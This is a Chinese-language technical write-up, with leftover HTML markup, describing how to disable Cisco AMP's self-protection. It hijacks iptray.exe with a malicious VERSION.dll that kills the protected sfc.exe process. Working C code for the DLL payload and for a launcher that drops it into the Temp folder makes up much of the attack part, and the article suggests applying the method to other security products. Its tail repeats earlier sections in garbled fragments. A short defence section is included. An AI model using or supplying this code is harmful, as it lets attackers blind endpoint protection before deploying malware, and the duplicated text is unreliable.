思科AMP自我保护进程绕过技术分析<\/h1>

1. 背景介绍<\/h2>
思科AMP（Advanced Malware Protection）是一种端点保护技术，具有自我保护机制，即使在获得SYSTEM权限后也难以终止其关键进程（如sfc.exe）。本文详细分析了一种绕过思科AMP自我保护的技术方法。<\/p>

2. 技术分析<\/h2>

2.1 自我保护机制观察<\/h3>

关键进程<\/strong>：sfc.exe（受保护且难以终止）<\/li>

保护特性<\/strong>：

阻止进程注入<\/li>
阻止调试<\/li>
即使有SYSTEM权限也无法直接终止<\/li> <\/ul> <\/li> <\/ul>
2.2 突破口发现<\/h3>
通过思科AMP控制面板发现：<\/p>

禁用保护服务需要密码<\/li>
iptray.exe程序可以禁用AMP的自我保护服务<\/li> <\/ul>
这表明iptray.exe与sfc.exe受同一策略保护，且iptray.exe具有关闭保护的能力。<\/p>
3. 绕过技术实现<\/h2>
3.1 技术路线<\/h3>
利用DLL劫持技术，通过以下步骤实现：<\/p>

使iptray.exe加载自定义DLL<\/li>
在DLL中执行终止sfc.exe的代码<\/li> <\/ol>
3.2 详细步骤<\/h3>
3.2.1 DLL加载分析<\/h4>
使用ProcessMonitor观察到iptray.exe尝试加载多个DLL，其中许多首次加载失败。这表明存在DLL劫持机会。<\/p>
3.2.2 设置DLL加载路径<\/h4>
使用SetDllDirectoryA<\/code>API将DLL加载路径重定向到可控目录：<\/p>
SetDllDirectoryA("C:<\/span>\\<\/span>Users<\/span>\\<\/span>xpn<\/span>\\<\/span>AppData<\/span>\\<\/span>Local<\/span>\\<\/span>Temp"<\/span>); <\/span><\/span><\/code><\/pre>3.2.3 创建恶意DLL<\/h4> 以VERSION.DLL为例，需要导出所有原始函数（防止崩溃）并在DllMain中实现攻击代码。<\/p> 3.2.4 攻击代码实现<\/h4> 在DLL_PROCESS_ATTACH事件中：<\/p> 枚举进程查找sfc.exe<\/li> 终止目标进程<\/li> <\/ol> 关键代码：<\/p> toolhelp =<\/span> CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0<\/span>); <\/span><\/span>PROCESSENTRY32 pe; <\/span><\/span>Process32First(toolhelp, &<\/span>pe); <\/span><\/span>do<\/span> { <\/span><\/span> if<\/span> (strncmp(pe.szExeFile, "sfc.exe"<\/span>, 7<\/span>) ==<\/span> 0<\/span>) { <\/span><\/span> p =<\/span> OpenProcess(PROCESS_TERMINATE, false, pe.th32ProcessID); <\/span><\/span> TerminateProcess(p, 1<\/span>); <\/span><\/span> break<\/span>; <\/span><\/span> } <\/span><\/span>} while<\/span> (Process32Next(toolhelp, &<\/span>pe)); <\/span><\/span>ExitProcess(0<\/span>); <\/span><\/span><\/code><\/pre>3.2.5 启动器程序<\/h4> 创建启动程序执行以下操作：<\/p> 从资源中提取恶意DLL<\/li> 设置DLL加载路径<\/li> 启动iptray.exe<\/li> <\/ol> 关键代码：<\/p> \/\/ 从资源获取DLL <\/span><\/span><\/span><\/span>HRSRC res =<\/span> FindResource(g_hModule, MAKEINTRESOURCEW(IDR_RT_RCDATA1), L<\/span>"RT_RCDATA"<\/span>); <\/span><\/span>HGLOBAL resMod =<\/span> LoadResource(g_hModule, res); <\/span><\/span>void<\/span> *<\/span>resource =<\/span> LockResource(resMod); <\/span><\/span>DWORD sizeOfResource =<\/span> SizeofResource(g_hModule, res); <\/span><\/span> <\/span><\/span>\/\/ 设置临时路径 <\/span><\/span><\/span><\/span>GetTempPathA(sizeof<\/span>(tempPath), tempPath); <\/span><\/span>snprintf(tempDll, sizeof<\/span>(tempDll), "%s<\/span>\\<\/span>%s"<\/span>, tempPath, "VERSION.dll"<\/span>); <\/span><\/span> <\/span><\/span>\/\/ 设置DLL路径 <\/span><\/span><\/span><\/span>SetDllDirectoryA(tempPath); <\/span><\/span> <\/span><\/span>\/\/ 写入DLL <\/span><\/span><\/span><\/span>HANDLE tempDllHandle =<\/span> CreateFileA(tempDll, GENERIC_READ |<\/span> GENERIC_WRITE, FILE_SHARE_READ |<\/span> FILE_SHARE_WRITE, NULL, CREATE_ALWAYS, 0<\/span>, NULL); <\/span><\/span>WriteFile(tempDllHandle, resource, sizeOfResource, &<\/span>bytesWritten, NULL); <\/span><\/span>CloseHandle(tempDllHandle); <\/span><\/span> <\/span><\/span>\/\/ 启动iptray.exe <\/span><\/span><\/span><\/span>STARTUPINFOA si; <\/span><\/span>PROCESS_INFORMATION pi; <\/span><\/span>memset(&<\/span>si, 0<\/span>, sizeof<\/span>(si)); <\/span><\/span>si.cb =<\/span> sizeof<\/span>(si); <\/span><\/span>memset(&<\/span>pi, 0<\/span>, sizeof<\/span>(pi)); <\/span><\/span>CreateProcessA(NULL, (LPSTR)"C:<\/span>\\<\/span>Program Files<\/span>\\<\/span>Cisco<\/span>\\<\/span>AMP<\/span>\\<\/span>6.1.7<\/span>\\<\/span>iptray.exe"<\/span>, NULL, NULL, false, 0<\/span>, NULL, tempPath, &<\/span>si, &<\/span>pi); <\/span><\/span><\/code><\/pre>4. 技术要点总结<\/h2> 信任链利用<\/strong>：利用受信任的iptray.exe进程执行恶意代码<\/li> DLL劫持<\/strong>：通过SetDllDirectory重定向DLL加载路径<\/li> 进程终止<\/strong>：在DLL中枚举并终止目标进程<\/li> 隐蔽性<\/strong>：利用合法进程执行攻击，绕过自我保护检测<\/li> <\/ol> 5. 防御建议<\/h2> 对于防御方，可采取以下措施：<\/p> 限制SetDllDirectory等API的使用<\/li> 实施DLL签名验证<\/li> 监控异常进程终止行为<\/li> 加强关键进程的双向保护<\/li> <\/ol> 6. 扩展思考<\/h2> 此技术可应用于其他具有类似保护机制的安全产品，关键在于：<\/p> 寻找受信任的可执行文件<\/li> 分析其DLL加载行为<\/li> 找到合适的劫持点<\/li> <\/ol> 该方法展示了在安全产品中，即使有强大的自我保护机制，也可能通过信任链中的薄弱环节被绕过。<\/p>

思科AMP自我保护进程绕过技术分析<\/h1>

1. 背景介绍<\/h2> 思科AMP（Advanced Malware Protection）是一种端点保护技术，具有自我保护机制，即使在获得SYSTEM权限后也难以终止其关键进程（如sfc.exe）。本文详细分析了一种绕过思科AMP自我保护的技术方法。<\/p>

2. 技术分析<\/h2>

3. 绕过技术实现<\/h2>

3.2 详细步骤<\/h3>

3.2.1 DLL加载分析<\/h4> 使用ProcessMonitor观察到iptray.exe尝试加载多个DLL，其中许多首次加载失败。这表明存在DLL劫持机会。<\/p>

3.2.3 创建恶意DLL<\/h4> 以VERSION.DLL为例，需要导出所有原始函数（防止崩溃）并在DllMain中实现攻击代码。<\/p>

1. 背景介绍<\/h2>
思科AMP（Advanced Malware Protection）是一种端点保护技术，具有自我保护机制，即使在获得SYSTEM权限后也难以终止其关键进程（如sfc.exe）。本文详细分析了一种绕过思科AMP自我保护的技术方法。<\/p>

3.2.1 DLL加载分析<\/h4>
使用ProcessMonitor观察到iptray.exe尝试加载多个DLL，其中许多首次加载失败。这表明存在DLL劫持机会。<\/p>

3.2.3 创建恶意DLL<\/h4>
以VERSION.DLL为例，需要导出所有原始函数（防止崩溃）并在DllMain中实现攻击代码。<\/p>